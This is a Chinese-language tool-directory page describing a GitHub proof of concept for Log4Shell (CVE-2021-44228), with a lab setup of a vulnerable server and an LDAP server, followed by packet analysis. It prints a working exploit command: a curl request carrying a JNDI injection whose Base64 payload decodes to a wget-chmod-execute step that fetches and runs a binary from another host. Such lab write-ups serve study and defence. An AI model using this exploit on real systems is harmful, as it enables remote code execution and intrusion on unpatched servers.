Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
LOG4J-CVE-2021-44228 — Log4Shell(CVE-2021-44228)的概念验证,演示通过JNDI注入实现远程代码执行,包括易受攻击的服务器搭建、漏洞利用命令及数据包分析。 | Kitploit
工具/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
数据包嗅探与分析Payload生成漏洞分析漏洞利用Web应用程序漏洞利用命令与控制Archived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell(CVE-2021-44228)的概念验证,演示通过JNDI注入实现远程代码执行,包括易受攻击的服务器搭建、漏洞利用命令及数据包分析。

查看仓库
83年前尚未审核

LOG4J-CVE-2021-44228

Log4Shell(也称为 CVE-2021-44228)是一个严重漏洞,可在使用 Apache 基金会 Log4j 的系统中实现远程代码执行。Log4j 是一个开源 Java 库,广泛应用于商业和开源软件产品及工具中。

0_6ImDNNYn_uGlIgog

POC 分析

漏洞服务器运行在 8080 端口上

Screenshot 2023-04-11 115553

LDAP 服务器运行在两个端口上:http 8888 和 ldap 1389

Screenshot 2023-04-11 115631

利用命令

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- 漏洞服务器 IP

172.17.0.1:1389 -- LDAP 服务器 IP

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

解密后的命令 - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

数据包分析

PACKETS

flowgraph

从数据包中可以看出,服务器向 LDAP 服务器发送了一个针对类的 GET 请求。如果检查利用类,可以看到 LDAP 服务器在利用类中发送了解密后的命令。

EXP_CLASS

参考

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

下载工具